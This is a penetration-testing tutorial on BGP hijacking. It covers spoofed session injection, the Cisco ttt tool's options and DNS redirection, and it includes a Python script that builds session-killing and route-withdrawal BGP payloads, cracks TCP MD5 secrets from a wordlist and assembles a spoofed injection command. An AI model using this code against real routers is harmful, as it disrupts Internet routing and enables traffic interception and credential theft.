BGP Hijacking attacks on Core Networks

Several tools capable of launching BGP hijacking attacks are freely available for download on the Internet. A vigilant system administrator or a penetration tester can use them to test her own or a client's network and evaluate its resilience to the BGP hijacking attacks an attacker could launch against it. In this section, we review two such tools, which are useful for launching a variety of BGP hijacking attacks against the routing infrastructure and the Domain Name System.

BGP Hijacking Attack
To inject messages into an existing BGP session between a speaker and its legitimate peer, the attacker first needs details of that session. They must learn the peer's IP address (traceroute towards the target network is one way to find the adjacent router), and because BGP runs over TCP they must also spoof the port pair: the peer's source port and the well-known BGP port 179 on the speaker's side. The injected segment must further carry a sequence number the speaker will accept, i.e. one that falls inside its current receive window, since TCP uses the sequence number to order segments and silently discards anything outside the window. Finally, the IP TTL (Time To Live) has to be right. TTL is decremented by every router on the path and the packet is dropped when it reaches zero; it exists so that looping packets do not circulate forever. eBGP peers are generally directly connected and send with a TTL of 1. A speaker that does not check the TTL only requires that the packet arrive, so the attacker merely has to choose a starting TTL that survives the path from their vantage point; where the speaker applies GTSM (RFC 5082), it expects a TTL of 255 from its directly connected peer, and a spoofed packet that has crossed even one router cannot pass that check. Crafting this attack is therefore not easy, because it requires knowledge of the live TCP and BGP session state. If it succeeds, however, the targeted speaker treats the message as legitimate and processes it as if its peer had sent it, allowing e.g. false route injection or withdrawal of existing routes.

Setting up an unauthorised BGP session with a peer
Because BGP peers need a TCP session before they can establish a BGP session, BGP inherits every attack that works against TCP. An attacker uses footprinting and reconnaissance techniques to gather information about an AS. Once they know the IP address of a BGP speaker, the address of its configured peer and the ports used for the session, they can send TCP packets spoofed with the peer's source address and port, set the TTL so that the packet arrives with a value the speaker accepts, and attempt to open an unauthorised TCP session with the speaker. Note that the attack is blind: the speaker's SYN-ACK goes to the real peer, not to the attacker, so the attacker also has to predict the speaker's initial sequence number and keep the real peer from answering the unexpected SYN-ACK with a RST. If the session comes up, it can be used to add false routes or to retrieve the existing ones. Configuring TCP MD5 signatures (RFC 2385) on the session defeats both this attack and the injection attack above unless the attacker also knows the shared secret.

Cisco TCP Test Tool
The TCP Test Tool (ttt) was written by Cisco's Critical Infrastructure Assurance Group (CIAG) to perform security assessments on Cisco devices. It lets the user craft and send customised TCP segments carrying any payload, and it borrows many of its ideas from the Nemesis packet-construction project. As the help output below shows, a large set of options is available for building a thorough test environment. The TCP Test Tool can be obtained from the Cisco Systems web site here ttt-1.3.tar.gz

     root $ ./ttt --help
     TCP Test Tool (ttt) Version 1.3
     Eloy Paris (elparis@cisco.com)
     From ideas by Sean Convery (sean@cisco.com) and the NEMESIS Project
     Usage: ttt [-h] [options]
     General options:
       -h, --help                     display this help and exit
       -c, --count NUM                number of segments to send (default is 1)
       -d, --delay NUM                delay in milliseconds (default is 0)
           --flood NUM                 flood the network by sending NUM packets


     TCP options:
       -x, --sport NUM                TCP source port
       -y, --dport NUM                TCP destination port
       -f, --tcpflags                  TCP flags
           -fS SYN, -fA ACK, -fR RST, -fP PSH, -fF FIN, -fU URG
          (can also use --syn, --ack, --rst, --psh, --fin, and --urg)
       -w, --window NUM               window size
       -s, --sequence NUM             sequence number (^ to increment by window)
       -a, --acknowledgement NUM      acknowledgement number
       -u, --urgent NUM               urgent pointer
       -P, --payload FILE             payload file (use stdin if FILE is '-')
       -5, --md5 SECRET               use TCP MD5 signatures (TCP option 19)
           --mss NUM                  TCP maximum segment size
           --wscale NUM               window scale option
           --nocksum                  don't compute TCP checksums
     IP options:
       -S, --src ADDRESS              source IP address
       -D, --dst ADDRESS              destination IP address
       -I, --id NUM                   IP ID
       -T, --ttl NUM                  IP time to live
       -t, --tos NUM                  IP type of service
   
The utility can also be driven from a scripting language to generate random payloads or specific option combinations, for instance for BGP session hijacking or for brute-forcing the secret behind a TCP MD5 signature, as tcpsig-crack.pl in the examples directory does. An attacker or penetration tester can generate a large number of test scenarios with this suite, limited only by the user's imagination.
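As an added example of scripting around ttt, not code from the original page or from Cisco's ttt distribution: the Python below builds two BGP payloads for ttt's --payload option (a NOTIFICATION with the Cease error code, which makes the receiver drop the session, and an UPDATE that withdraws one prefix), computes the RFC 2385 TCP MD5 signature over a segment the way a speaker would verify it, and recovers the session secret from a wordlist given one captured signed segment, which is the approach a script such as tcpsig-crack.pl takes. The addresses, ports, sequence numbers, secret and wordlist are constructed sample values, and the ttt command line uses only flags listed in the help output above.

```python
"""Build BGP payloads for ttt --payload and brute-force a TCP MD5 (RFC 2385) secret.

Added example; not code from the original page or from Cisco's ttt distribution.
Addresses, ports, sequence numbers, the secret and the wordlist are constructed.
"""
import hashlib
import ipaddress
import struct
from typing import Optional

BGP_MARKER = b"\xff" * 16            # RFC 4271: 16-byte all-ones marker
BGP_UPDATE, BGP_NOTIFICATION = 2, 3
BGP_PORT = 179


def bgp_message(msg_type: int, body: bytes) -> bytes:
    """Fixed 19-byte header (marker, total length, type) followed by the body."""
    return BGP_MARKER + struct.pack("!HB", 19 + len(body), msg_type) + body


def notification_cease() -> bytes:
    """NOTIFICATION, error code 6 (Cease), subcode 0: the receiver closes the session."""
    return bgp_message(BGP_NOTIFICATION, bytes([6, 0]))


def update_withdraw(prefix: str) -> bytes:
    """UPDATE that withdraws one IPv4 prefix and carries no path attributes or NLRI."""
    net = ipaddress.IPv4Network(prefix)
    nbytes = (net.prefixlen + 7) // 8                 # prefix is encoded in as few octets as needed
    withdrawn = bytes([net.prefixlen]) + net.network_address.packed[:nbytes]
    body = struct.pack("!H", len(withdrawn)) + withdrawn + struct.pack("!H", 0)
    return bgp_message(BGP_UPDATE, body)


def tcp_md5_digest(src: str, dst: str, sport: int, dport: int, seq: int, ack: int,
                   flags: int, window: int, payload: bytes, secret: bytes,
                   data_offset: int = 10) -> bytes:
    """RFC 2385 signature: MD5 over the IPv4 pseudo-header, the fixed TCP header
    with the checksum zeroed (options excluded), the segment data and the secret.
    data_offset is the header length in 32-bit words as sent on the wire
    (10 = 20-byte header + 18-byte option 19 + 2 bytes of NOP padding)."""
    tcp_len = data_offset * 4 + len(payload)
    pseudo = (ipaddress.IPv4Address(src).packed + ipaddress.IPv4Address(dst).packed
              + struct.pack("!BBH", 0, 6, tcp_len))
    header = struct.pack("!HHIIBBHHH", sport, dport, seq, ack,
                         data_offset << 4, flags, window, 0, 0)
    return hashlib.md5(pseudo + header + payload + secret).digest()


def crack_md5_secret(segment: dict, digest: bytes, wordlist) -> Optional[bytes]:
    """Offline guess of the secret from one captured signed segment: recompute
    the digest for each candidate and compare with the captured option 19 value."""
    for candidate in wordlist:
        if tcp_md5_digest(**segment, secret=candidate) == digest:
            return candidate
    return None


def ttt_command(src, dst, sport, seq, ack, window, ttl, payload_file, secret=None) -> str:
    """ttt command line (flags from its --help) that sends the payload as the peer.
    ttl is the value ttt puts on the wire; a remote attacker needs enough for the path."""
    cmd = ["./ttt", "-S", src, "-D", dst, "-x", str(sport), "-y", str(BGP_PORT),
           "--ack", "--psh", "-s", str(seq), "-a", str(ack), "-w", str(window),
           "-T", str(ttl), "-P", payload_file]
    if secret is not None:
        cmd += ["-5", secret]
    return " ".join(cmd)


def demo() -> dict:
    # Constructed session: peer 198.51.100.1:53000 -> speaker 192.0.2.1:179.
    segment = dict(src="198.51.100.1", dst="192.0.2.1", sport=53000, dport=BGP_PORT,
                   seq=0x1A2B3C4D, ack=0x0F0E0D0C, flags=0x18, window=16384,
                   payload=notification_cease())
    # The digest a sniffer would read from option 19 of that segment.
    captured_digest = tcp_md5_digest(**segment, secret=b"bgp-s3cret")
    wordlist = [b"cisco", b"bgp", b"password", b"bgp-s3cret", b"secret"]
    found = crack_md5_secret(segment, captured_digest, wordlist)
    payload = update_withdraw("203.0.113.0/24")
    cmd = ttt_command("198.51.100.1", "192.0.2.1", 53000, 0x1A2B3C4D, 0x0F0E0D0C,
                      16384, 64, "withdraw.bin", found.decode() if found else None)
    return {"secret": found, "payload": payload, "cmd": cmd}


if __name__ == "__main__":
    result = demo()
    with open("withdraw.bin", "wb") as fh:     # payload file for ttt -P
        fh.write(result["payload"])
    print("secret:", result["secret"])
    print(result["cmd"])
```

The withdrawal UPDATE for a /24 is 27 bytes: the 19-byte header, a 2-byte withdrawn-routes length of 4, the prefix as one length octet plus three address octets, and a zero total path attribute length. Signing with -5 only helps once the secret is known; without it, a speaker configured for RFC 2385 rejects the segment regardless of how well the sequence number and TTL were chosen.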

DNS attacks
Many attackers target the Domain Name System (DNS) through routing attacks, because corrupting name resolution lets them collect users' personal data such as banking details and passwords. After a successful routing attack, the attacker can redirect traffic for a victim's domain to a web server under their control; when a user logs in to a service there, the attacker captures the credentials. More damaging attacks use interdomain routing as a proxy: for instance, by announcing the prefixes of the root DNS servers over BGP, the attacker can masquerade as those servers and steer the resolution of any name. This gives the attacker a huge amount of flexibility and the potential to cause immense damage to the Internet community.